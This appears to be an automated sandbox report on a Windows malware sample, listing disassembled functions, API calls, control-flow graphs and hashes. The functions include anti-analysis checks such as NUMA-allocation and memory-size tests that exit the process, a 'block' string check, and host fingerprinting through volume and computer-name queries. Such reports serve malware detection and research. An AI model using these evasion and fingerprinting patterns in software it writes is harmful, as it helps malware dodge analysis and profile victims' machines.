                        control_flow_graph 2721 508ca0-508cc4 StrCmpCA 2722 508cc6-508cc7 ExitProcess 2721->2722 2723 508ccd-508ce6 2721->2723 2725 508ee2-508eef call 4f2a20 2723->2725 2726 508cec-508cf1 2723->2726 2727 508cf6-508cf9 2726->2727 2729 508ec3-508edc 2727->2729 2730 508cff 2727->2730 2729->2725 2770 508cf3 2729->2770 2732 508d30-508d3f lstrlen 2730->2732 2733 508e56-508e64 StrCmpCA 2730->2733 2734 508d5a-508d69 lstrlen 2730->2734 2735 508dbd-508dcb StrCmpCA 2730->2735 2736 508ddd-508deb StrCmpCA 2730->2736 2737 508dfd-508e0b StrCmpCA 2730->2737 2738 508e1d-508e2b StrCmpCA 2730->2738 2739 508e3d-508e4b StrCmpCA 2730->2739 2740 508d84-508d92 StrCmpCA 2730->2740 2741 508da4-508db8 StrCmpCA 2730->2741 2742 508d06-508d15 lstrlen 2730->2742 2743 508e88-508e9a lstrlen 2730->2743 2744 508e6f-508e7d StrCmpCA 2730->2744 2756 508d41-508d46 call 4f2a20 2732->2756 2757 508d49-508d55 call 4f2930 2732->2757 2733->2729 2752 508e66-508e6d 2733->2752 2758 508d73-508d7f call 4f2930 2734->2758 2759 508d6b-508d70 call 4f2a20 2734->2759 2735->2729 2745 508dd1-508dd8 2735->2745 2736->2729 2746 508df1-508df8 2736->2746 2737->2729 2747 508e11-508e18 2737->2747 2738->2729 2748 508e31-508e38 2738->2748 2739->2729 2749 508e4d-508e54 2739->2749 2740->2729 2761 508d98-508d9f 2740->2761 2741->2729 2750 508d17-508d1c call 4f2a20 2742->2750 2751 508d1f-508d2b call 4f2930 2742->2751 2754 508ea4-508eb0 call 4f2930 2743->2754 2755 508e9c-508ea1 call 4f2a20 2743->2755 2744->2729 2753 508e7f-508e86 2744->2753 2745->2729 2746->2729 2747->2729 2748->2729 2749->2729 2750->2751 2779 508eb3-508eb5 2751->2779 2752->2729 2753->2729 2754->2779 2755->2754 2756->2757 2757->2779 2758->2779 2759->2758 2761->2729 2770->2727 2779->2729 2780 508eb7-508eb9 2779->2780 2780->2729 2781 508ebb-508ebd lstrcpy 2780->2781 2781->2729
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 8682d9f5304acd77b39e1024417997cc675f8c62d19d2487f7f774905c2fbb35
                        • Instruction ID: 938ec60b6b1ae3a5b8a049b8f975df0ca57235c29c45aa8407c8634653333acf
                        • Opcode Fuzzy Hash: 8682d9f5304acd77b39e1024417997cc675f8c62d19d2487f7f774905c2fbb35
                        • Instruction Fuzzy Hash: 9A514971A04606ABDB209F75DD84E3F7FF8BF04704B108C2DE582D6691DBB8E9429B25
                        Function 00512740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2782 512740-512783 GetWindowsDirectoryA 2783 512785 2782->2783 2784 51278c-5127ea GetVolumeInformationA 2782->2784 2783->2784 2785 5127ec-5127f2 2784->2785 2786 5127f4-512807 2785->2786 2787 512809-512820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 512822-512824 2787->2788 2789 512826-512844 wsprintfA 2787->2789 2790 51285b-512872 call 5171e0 2788->2790 2789->2790
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0051277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,005093B6,00000000,00000000,00000000,00000000), ref: 005127AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0051280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512816
                        • wsprintfA.USER32 ref: 0051283B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: f939538ed572e54b54a5f36a8ba45ea5716ea603d720a5283fb1d638f0337201
                        • Instruction ID: 600036ddaac3bbffa9fc4c3b7f793fd2210339f96d44a215f8fa1dce18ed4257
                        • Opcode Fuzzy Hash: f939538ed572e54b54a5f36a8ba45ea5716ea603d720a5283fb1d638f0337201
                        • Instruction Fuzzy Hash: 92316FB1D08209ABDB14CFB889859EFBFBCFF58710F104169E505E7650E6349A418BA6
                        Function 004F4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2793 4f4bc0-4f4bce 2794 4f4bd0-4f4bd5 2793->2794 2794->2794 2795 4f4bd7-4f4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 4f2a20 2794->2795
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 004F4BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004F4C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004F4C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 004F4C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 004F4C27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: 040a8c5425f10425022a330eeba9adc540214f2ddc26414b19eb2fde5cd9bfe1
                        • Instruction ID: 3304781c3b01c1d2faaced3ce951ab2c15667457d4582dc2ac8e550a65fd6326
                        • Opcode Fuzzy Hash: 040a8c5425f10425022a330eeba9adc540214f2ddc26414b19eb2fde5cd9bfe1
                        • Instruction Fuzzy Hash: CB012D71D01218ABEB50DFA9EC45B9EBBB8EB58324F00812AF914E7390DB7459058FD5
                        Function 004F1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2798 4f1030-4f1055 GetCurrentProcess VirtualAllocExNuma 2799 4f105e-4f107b VirtualAlloc 2798->2799 2800 4f1057-4f1058 ExitProcess 2798->2800 2801 4f107d-4f1080 2799->2801 2802 4f1082-4f1088 2799->2802 2801->2802 2803 4f108a-4f10ab VirtualFree 2802->2803 2804 4f10b1-4f10b6 2802->2804 2803->2804
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F1046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 004F104D
                        • ExitProcess.KERNEL32 ref: 004F1058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004F106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004F10AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: 48e7e41c817d3539ed5a107475e97c3c445643fe934be905abaf8f4f97697267
                        • Instruction ID: b0ede13e4165cc4a8fd02049d187b7a17d58963ab6ef76950383b4c27beb8cc1
                        • Opcode Fuzzy Hash: 48e7e41c817d3539ed5a107475e97c3c445643fe934be905abaf8f4f97697267
                        • Instruction Fuzzy Hash: DD01F471740208BBE7304A656C1AF6B77ADE785B15F348019F708E73D0D9B9EA01866C
                        Function 0050EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2805 50ee90-50eeb5 call 4f2930 2808 50eeb7-50eebf 2805->2808 2809 50eec9-50eecd call 4f6c40 2805->2809 2808->2809 2810 50eec1-50eec3 lstrcpy 2808->2810 2812 50eed2-50eee8 StrCmpCA 2809->2812 2810->2809 2813 50ef11-50ef18 call 4f2a20 2812->2813 2814 50eeea-50ef02 call 4f2a20 call 4f2930 2812->2814 2820 50ef20-50ef28 2813->2820 2823 50ef04-50ef0c 2814->2823 2824 50ef45-50efa0 call 4f2a20 * 10 2814->2824 2820->2820 2822 50ef2a-50ef37 call 4f2930 2820->2822 2822->2824 2831 50ef39 2822->2831 2823->2824 2826 50ef0e-50ef0f 2823->2826 2830 50ef3e-50ef3f lstrcpy 2826->2830 2830->2824 2831->2830
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050EF3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: 1ebc0bed2db8a2154d3f5954556a2d30b34cbde4b3ca60786aac8e06bec73e18
                        • Instruction ID: a02d2ea385c51119dcfb86efc6874bd7dbf4701b6488d8fb5c5810c836307ff7
                        • Opcode Fuzzy Hash: 1ebc0bed2db8a2154d3f5954556a2d30b34cbde4b3ca60786aac8e06bec73e18
                        • Instruction Fuzzy Hash: 6C210570B1014E5BCB21FF76DD46A6E3BA4FF10304F14586DB949D7292DA74DC118B94
                        Function 004F10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2886 4f10c0-4f10cb 2887 4f10d0-4f10dc 2886->2887 2889 4f10de-4f10f3 GlobalMemoryStatusEx 2887->2889 2890 4f10f5-4f1106 2889->2890 2891 4f1112-4f1114 ExitProcess 2889->2891 2892 4f111a-4f111d 2890->2892 2893 4f1108 2890->2893 2893->2891 2894 4f110a-4f1110 2893->2894 2894->2891 2894->2892
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 240e6091fb5790abc90b00af40face7da9ecf13f5f1a3c3dde50f2bbd5f24ac4
                        • Instruction ID: f8373780ddf56193da62d476036dd705b14dfee3467f74b7792619feef4f5add
                        • Opcode Fuzzy Hash: 240e6091fb5790abc90b00af40face7da9ecf13f5f1a3c3dde50f2bbd5f24ac4
                        • Instruction Fuzzy Hash: 37F02E7010424DCBE7106A65DA0573EF7DCE705350F14452BDF96C22A1EA38C840912F
                        Function 00508C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2895 508c88-508cc4 StrCmpCA 2898 508cc6-508cc7 ExitProcess 2895->2898 2899 508ccd-508ce6 2895->2899 2901 508ee2-508eef call 4f2a20 2899->2901 2902 508cec-508cf1 2899->2902 2903 508cf6-508cf9 2902->2903 2905 508ec3-508edc 2903->2905 2906 508cff 2903->2906 2905->2901 2946 508cf3 2905->2946 2908 508d30-508d3f lstrlen 2906->2908 2909 508e56-508e64 StrCmpCA 2906->2909 2910 508d5a-508d69 lstrlen 2906->2910 2911 508dbd-508dcb StrCmpCA 2906->2911 2912 508ddd-508deb StrCmpCA 2906->2912 2913 508dfd-508e0b StrCmpCA 2906->2913 2914 508e1d-508e2b StrCmpCA 2906->2914 2915 508e3d-508e4b StrCmpCA 2906->2915 2916 508d84-508d92 StrCmpCA 2906->2916 2917 508da4-508db8 StrCmpCA 2906->2917 2918 508d06-508d15 lstrlen 2906->2918 2919 508e88-508e9a lstrlen 2906->2919 2920 508e6f-508e7d StrCmpCA 2906->2920 2932 508d41-508d46 call 4f2a20 2908->2932 2933 508d49-508d55 call 4f2930 2908->2933 2909->2905 2928 508e66-508e6d 2909->2928 2934 508d73-508d7f call 4f2930 2910->2934 2935 508d6b-508d70 call 4f2a20 2910->2935 2911->2905 2921 508dd1-508dd8 2911->2921 2912->2905 2922 508df1-508df8 2912->2922 2913->2905 2923 508e11-508e18 2913->2923 2914->2905 2924 508e31-508e38 2914->2924 2915->2905 2925 508e4d-508e54 2915->2925 2916->2905 2937 508d98-508d9f 2916->2937 2917->2905 2926 508d17-508d1c call 4f2a20 2918->2926 2927 508d1f-508d2b call 4f2930 2918->2927 2930 508ea4-508eb0 call 4f2930 2919->2930 2931 508e9c-508ea1 call 4f2a20 2919->2931 2920->2905 2929 508e7f-508e86 2920->2929 2921->2905 2922->2905 2923->2905 2924->2905 2925->2905 2926->2927 2955 508eb3-508eb5 2927->2955 2928->2905 2929->2905 2930->2955 2931->2930 2932->2933 2933->2955 2934->2955 2935->2934 2937->2905 2946->2903 2955->2905 2956 508eb7-508eb9 2955->2956 2956->2905 2957 508ebb-508ebd lstrcpy 2956->2957 2957->2905
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 09483b232096fd09e7f1a0966e38def93de5feb9a7d569cbe211a2bb5c0377e8
                        • Instruction ID: 2f68665c6b69de84acd6ecabc564883f76e30f04cca19bd428d863457a5bf70c
                        • Opcode Fuzzy Hash: 09483b232096fd09e7f1a0966e38def93de5feb9a7d569cbe211a2bb5c0377e8
                        • Instruction Fuzzy Hash: B1E0D860200246EFD7209BB5DC48D5B7FACFF84700B05C168E9455B161DB34DC02C7D8
                        Function 00512AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2958 512ad0-512b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 512b44-512b59 2958->2959 2960 512b24-512b36 2958->2960
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00512B1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 8cf193d0708492dbdce95b81538e7686fc0002efe7d7e8955ccfa7693ec69c23
